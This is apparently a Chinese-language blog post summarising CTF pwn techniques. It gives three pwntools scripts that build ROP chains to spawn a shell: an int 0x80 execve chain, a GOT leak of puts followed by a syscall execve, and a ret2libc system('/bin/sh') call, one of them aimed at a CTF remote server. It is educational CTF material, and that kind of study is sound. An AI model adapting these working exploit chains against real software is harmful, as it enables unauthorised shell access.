avatar

CTF-Pwn-ROP来getshell的方式总结
dummy

主要还是要学习32位程序和64位程序函数参数的不同寄存器处理

https://tearorca.github.io/32%E4%BD%8D%E5%92%8C64%E4%BD%8D%E5%9C%A8pwn%E4%B8%AD%E7%9A%84%E4%B8%8D%E5%90%8C%E7%82%B9/

系统调用syscall

灵感来源:https://bbs.pediy.com/thread-248682.htm

使用的程序为网页中的pwn2,pwn2中有大量的gadget,不用ret2libc

image-20210715230050374

image-20210715230050374

from pwn import *

context.log_level = 'DEBUG'

p = process('./pwn2')
elf = ELF('./pwn2')

def get_addr(s):
return next(elf.search(s))


p.recv()

pop_eax = 0x080bb196
pop_ecx_ebx = 0x0806eb91
pop_edx = 0x0806eb6a

int80 = 0x08049421
binsh = 0x080be408

payload = 112 * 'a'
payload += p32(pop_eax)
payload += p32(0xb)
payload += p32(pop_ecx_ebx)
payload += p32(0)
payload += p32(binsh)
payload += p32(pop_edx)
payload += p32(0)
payload += p32(int80)

p.sendline(payload)
p.interactive()

利用syscall函数

#!/usr/bin/python
# -*- coding: UTF-8 -*-
from pwn import *
from LibcSearcher import *
import code

context.log_level = 'DEBUG'

p = process('./rop')
elf = ELF('./rop')


pop_rdi = 0x4011bb
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']
p.recv()
# 打印出puts地址后,返回到main函数
payload1 = 'a' * 18 + ''.join(map(p64, [pop_rdi, puts_got, puts_plt, main]))
p.sendline(payload1)
# 将地址补全到8位
puts_libc = u64(p.recv(6).ljust(8, '\x00'))
print hex(puts_libc)
p.recv()

libc = elf.libc
libc_base = puts_libc - libc.symbols['puts']
# ROPgadget --binary libc文件 | grep ...
pop_rax = libc_base + 0x3ee28
pop_rdi = libc_base + 0x26796
pop_rsi = libc_base + 0x2890f
pop_rdx = libc_base + 0xcb16d
syscall = libc_base + 0x2552b
binsh = libc_base + next(libc.search('/bin/sh'))
# 59是execve的调用号
payload2 = 'a' * 18 + ''.join(map(p64, [pop_rax, 59, pop_rdi, binsh, pop_rsi, 0, pop_rdx, 0, syscall]))
p.sendline(payload2)
p.interactive()

# code.interact(local=locals())

利用system函数

#!/usr/bin/python
# -*- coding: UTF-8 -*-
from pwn import *
from LibcSearcher import *
import sys
import code

context.log_level = 'DEBUG'

reload(sys)
sys.setdefaultencoding("utf-8")

# p = process('rop')
p = remote('node4.buuoj.cn', 27296)
elf = ELF('rop')

padding_len = 0x28

pop_rdi = 0x400733
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']
p.recv()
# 打印出puts地址后,返回到main函数
payload1 = 'a' * padding_len + ''.join(map(p64, [pop_rdi, puts_got, puts_plt, main]))
p.sendline(payload1)
# 将地址补全到8位
puts_libc = u64(p.recv(6).ljust(8, '\x00'))
print hex(puts_libc)
p.recv()

# # ROPgadget --binary libc文件 | grep ...
libc=LibcSearcher('puts', puts_libc)
libcbase_addr = puts_libc - libc.dump('puts')
system_addr = libcbase_addr+libc.dump('system')
binsh_addr = libcbase_addr+libc.dump('str_bin_sh')


payload2 = 'a' * padding_len + ''.join(map(p64, [pop_rdi, binsh_addr, system_addr]))
p.sendline(payload2)
p.interactive()
文章作者: X Mεl0n
文章链接: http://www.zrzz.site/posts/ff563f2c/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 X Mεl0n | 随手记

评论